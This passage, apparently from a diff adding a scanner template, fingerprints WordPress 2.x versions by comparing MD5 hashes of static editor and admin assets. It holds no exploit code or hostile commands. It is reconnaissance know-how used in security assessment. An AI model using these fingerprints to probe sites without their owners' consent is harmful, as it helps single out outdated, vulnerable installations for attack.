"(\"159795ca1b1fd16f310334db6c917515\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"e6a384f19aef7c0fb2f2e0ee0bdc72e0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/italic_de_se.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"2eafa516095a0d8b3cd03e7b8a4430f7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/xp/tab_sel_end.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"6a4ffda436f2ffe5a56107d6c8c5a332\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/xp/tabs_bg.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"b3a2d232dd5bf5e8a829571bbec08522\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/xp/tab_end.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"de9e554769bc24fc7f2acefddb04e895\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/xp/tab_sel_bg.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"9787ead6369f4cb45f69e4dea1ceaeb1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/xp/tab_bg.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"276f3f45f0d50a533187aefa7ce6b210\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/italic_ru.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"bbc7be374d89a1ced0441287eeba297a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/outdent.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"b7249cc5a3bce3971f0b19fccac07f60\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/undo.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"7883b9e1f9bf0b860e77b904e1941591\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/colors.jpg" + matchers: + - type: dsl + name: 2.2.1 - 2.3.3 + dsl: + - "(\"02ae48639aa5729e6a40fb64455c32a2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/unlink.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"dcd93dd109c065562fe9f5d6f978a028\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/underline.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"203e5139ee72c00d597e4b00ed96d84b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/code.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"158e1ad2922f59a800e27e459c71d051\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/removeformat.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"e9c387cc80f33b14447b628df1906639\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/table_delete_row.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"b6943c3ba64c56ea086d33b21d66004a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/underline_fr.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"027608183023f80b0c9bf663c9e81301\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/justifycenter.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"9cc7a9c3f4c2a697c32aaab6bb3185b8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/hr.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"8d92cb73437c32a0327323b538ad2214\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/color.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"c8e11c751b5575025fc50b7701719f0f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/underline_tw.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"3236a0d3fca6a4a381da0f2b2a9337e8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/underline_ru.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"843cb1b52316024629bdc6adc665b918\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/center.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"9cc7a9c3f4c2a697c32aaab6bb3185b8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/table_insert_col_after.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"48b353ad270b0e05d7de456cd811c420\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/visualaid.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"50cfb5ef70eadd59e78c6c833c8a5239\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/spacer.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"12bf9e19374920de3146a64775f46a5e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/forecolor.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"6b4b8602d61e17fc13a8e1abd284ecd3\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"9e936f32d2bf0338d1e261d18a1532e4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/right.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"94fafae0c4b30d01d034a54376acdac3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/custom_1.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"bd1f96d299847c47fd535b1b54d3a2df\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/justifyfull.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"009750822e228e10f51e746ddf8d1fec\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/paste.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"7bde577f9f26ffb18e522331270140f2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/full.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"009750822e228e10f51e746ddf8d1fec\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/strikethrough.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"0dcca301aa909817a82d705cc9a62952\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/sub.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"dfbcf5f590c7a7d972f2750bf3e56a72\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/link.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"010306c94f6b00146d9eda296a945040\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/underline_es.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"027608183023f80b0c9bf663c9e81301\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/sup.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"cec59878503a628b343ff844f81aff1f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/bold_de_se.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"fa8d362da3c15cab263bc7eb2d192dd1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/bold_ru.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"d70c4659f516157591c2470695c6d64e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/table_insert_row_before.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"0e37e4c48dcddb1123bc6140ce323694\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/copy.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"51e409b11aa51c150090697429a953ed\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/redo.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"c2b3b80e20aa7f50ec45acb999373425\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/image.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"a74e3cc061c26a326844ec06f65b9a1f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/anchor.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"7bcf9bd9100fe611646435390e1158d5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/cut.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"c8f1a0b1cc8e32e10cdf3d38f71bf44f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/italic.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"c8652735e55a968a2dd24d286c89642e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/close.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"6cc9d27bdda91ad192a4326a653ba566\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/langs/en.js" + matchers: + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"4841943ffffb477d082fbf8a3937b4d3\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"890a670585bdaa592de8dcb490136d2e\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"f886e44ef37b8158c5be50bca0b72480\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"d31d6fcc58943a8c8792f1d1271be703\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/css/editor_popup.css" + matchers: + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"66e83a9a61c15fb26106264a8c5ddea8\" == md5(body))" + - type: dsl + name: 2.1 - 2.2.3 + dsl: + - "(\"b86dfe84d14780cc3c9b35781809f046\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"4618d2b44763abe1f922992bad409cd2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/css/colorpicker.css" + matchers: + - type: dsl + name: 2.2.1 - 2.3.3 + dsl: + - "(\"61140d3dc718dca29e319aa3072e6f9f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/css/editor_content.css" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"577740b3c4125b3eef84905151a9f0ff\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"df0e44ab19a98d7b5324a5b83a4bf0b4\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/css/editor_ui.css" + matchers: + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"16814b0e0cc2e6bbacc6c715f191bc10\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"892361760081259446f63b7a5896d626\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"3eff88011ee850654648663924d58483\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/spellchecker/images/spellchecker.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"a190764ce4e0f7a227b89a9ce267abcd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/spellchecker/images/wline.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"c136c9f8e00718a98947a21d8adbcc56\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/spellchecker/langs/en.js" + matchers: + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"391dfb5bc08361e0aaf6acc83d1b9e9c\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"76d3b8f92d5fe33102d22036864532e3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/spellchecker/css/spellchecker.css" + matchers: + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"6a3879ddf4a1422a4d297f884272b231\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"7617a08b84cb3c3c7e1b6ba3c999055c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wphelp/editor_plugin.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"d84f3a83a5ea5531637c497081f61b2f\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"baa7d736a8373a4403f36839ae29e011\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wphelp/images/help.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"4cd4a5d2cdcd74c8aeced17813afd6ea\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wphelp/langs/en.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"487b329696681dcf9ea87ec093da28ad\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"4393d22c761bf437231826cd8521dcdf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/jscripts/pasteword.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"af0196506a000742794e61b964a9e98c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/jscripts/pastetext.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"a94aa9143e2ba3e944e95afc7aebc108\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/images/selectall.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"4dbdedd53f48a7df7d6c1366169d415f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/images/pastetext.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"84bf65d144efe912c49f848f8ab955c1\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/images/pasteword.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"4126df7324911c861b159df6217a820e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/langs/en.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"a1c015c6ec40c0a355d41fceb42e5d2e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/autosave/editor_plugin_src.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"5693ef7bb68cb84f97cfdbcb9df64d07\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"3d97f94c8e7e1ad347c43b40329da025\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/autosave/langs/en.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"f005861cf489c578796a76a7278084b3\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"b1e0027134a866f286b1e2dd314f9578\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/jscripts/mcwindows.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"f6ff4ebb7c6c53317abdb6d39c05d065\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/images/window_minimize.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"db7caf5944c85fa8d1fdfe9786672e16\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/images/window_close.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"dbd0ef59421094496fc06f00754cd28f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/images/spacer.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"221d8352905f2c38b3cb2bd191d630b0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/images/window_resize.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"7becf074be57ca4c386dda61ec406668\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/images/window_maximize.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"b346e6682287174fe73f2ad522c7df22\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/css/inlinepopup.css" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"323476688c03e43d7c71f427b7d176dc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/directionality/images/rtl.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"69981824e7e2d3e2bc1e431f506e509e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/directionality/images/ltr.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"85865a3e9b3b3be7e67906bd3b2fc46f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/directionality/langs/en.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"368301dad33c512083c89420d46d4740\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"72843c656a5452135613174035d9d42a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/images/help.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"4cd4a5d2cdcd74c8aeced17813afd6ea\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"4f0e869c8bcf84c92dd7f94a80739fb9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/images/more.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"dff3bc0a01a614b601b7826415bfe4ca\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/images/page.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"ec8d1ed1b0fd137cacdda9e316ebed31\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/images/toolbars.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"33e46a907572061c981e459ae022b40d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/images/more_bug.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"c38cc928b95c0be49ec083648084d190\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/images/page_bug.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"32a68c86a6beffdd042abf0b0c595328\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/langs/en.js" + matchers: + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"bf0bb5872302fe477bc1512ea562e98b\" == md5(body))" + - type: dsl + name: 2.2 - 2.2.3 + dsl: + - "(\"1b2855b206fa83e79b040809db339eb3\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"26fdadca806efcef54b9485a8a76fd72\" == md5(body))" + - type: dsl + name: 2.0.4 - 2.0.11 + dsl: + - "(\"3fca13e910ad3f0282af47905a3ab868\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.1 + dsl: + - "(\"da5b27e2a8961d07f4900c6dc4807c75\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/wordpress.css" + matchers: + - type: dsl + name: 2.2 - 2.3.3 + dsl: + - "(\"327263b7922359d6456d38a3dbdb33fe\" == md5(body))" + - type: dsl + name: 2.1 - 2.1.3 + dsl: + - "(\"008e05c3702eebe1730c58ad208a8520\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.11 + dsl: + - "(\"f8dfd0c4d779272785ede08c83d1cb20\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/langs/en.js" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"a9c67a04e2d5c8f05b35256746c1547b\" == md5(body))" + - type: dsl + name: 2.0.4 - 2.0.11 + dsl: + - "(\"9acb9d10f3310515d46a592ec8722e09\" == md5(body))" + - type: dsl + name: 2.0 - 2.0.1 + dsl: + - "(\"da427e0fb506e2e403dde16612f4f7ca\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/box-butt-left.gif" + matchers: + - type: dsl + name: 2.0.4 - 2.3.3 + dsl: + - "(\"729c70ab984f1078ec91398ba55e0d05\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/box-head.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"87f02ca247ab3a0a631a5248b1da342d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/box-butt-right.gif" + matchers: + - type: dsl + name: 2.0.4 - 2.3.3 + dsl: + - "(\"f354e52a372a936e86212c7d76eb5620\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/box-head-right.gif" + matchers: + - type: dsl + name: 2.0.4 - 2.3.3 + dsl: + - "(\"0907b7ac6a357333357a0f12c0890d41\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/login-bkg-tile.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"fb31d6fa4de06f45e077be1a53dc9975\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/heading-bg.gif" + matchers: + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"99159ef1b8abd8b907abcba0de48d585\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/login-bkg-bottom.gif" + matchers: + - type: dsl + name: 2.1 - 2.3.3 + dsl: + - "(\"580bb0b7fade637e26f3860b87f32e3b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/box-bg-left.gif" + matchers: + - type: dsl + name: 2.0.4 - 2.3.3 + dsl: + - "(\"3bb60b3e953e96e70ebd07db595e3527\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/notice.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"b8c332ebadeb17298472c4ba3c009ccf\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/box-head-left.gif" + matchers: + - type: dsl + name: 2.0.4 - 2.3.3 + dsl: + - "(\"f4e3d9071653ae7a841689be7c487333\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/toggle.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"f3653960e8f0ae4cdd7804f60c133f81\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/box-butt.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"df8848b32f98e52c08a29afca280d753\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/box-bg-right.gif" + matchers: + - type: dsl + name: 2.0.4 - 2.3.3 + dsl: + - "(\"7d5f2df59d28b587f741e4d285941067\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/images/box-bg.gif" + matchers: + - type: dsl + name: 2.0 - 2.3.3 + dsl: + - "(\"1f7174c8737cbd04837faf5e384013bd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/upload.css" + matchers: + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"b3503aa6a8fd1fe0996951232aedfd58\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/dbx-admin-key.js" + matchers: + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"9301b8c88339ada63969bf9c7592c805\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/link-cat.js" + matchers: + - type: dsl + name: 2.3 - 2.3.3 + dsl: + - "(\"e312e9c4c47464e8484370c1ae680835\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/jquery/jquery.dimensions.min.js" + matchers: + - type: dsl + name: 2.5 - 2.5.1 + dsl: + - "(\"47c86e764c9d5dec1a2929f06cd7464a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/popups.css" + matchers: + - type: dsl + name: 2.1 - 2.5.1 + dsl: + - "(\"b548e47b5fef91f0a2ac405e0d2bde23\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/tar.png" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"f214503adb3d0946bf0f78a6fb815531\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/text.png" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"d64f782215bff7917a77309ddb8ca739\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/doc.png" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"8c7bcb970b8dd6bffdb162e153b148b6\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/exe.png" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"c1dd9f17509fb7bf683fd1faf1a60b17\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/zip.png" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"99fbe6255f4fddf2f85467ed26d38ee8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/video.png" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"d7086fb6dd56f54333b273eca67eee80\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/css.png" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"33dbb7b35ac859049fadec238f20b6dd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/default.png" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"0dab7bf1ca21c5c0187b8cce6a4beddb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/images/swf.png" + matchers: + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"66aaea9de851ee5d375b64a7cb621589\" == md5(body))" + - method: GET + path: 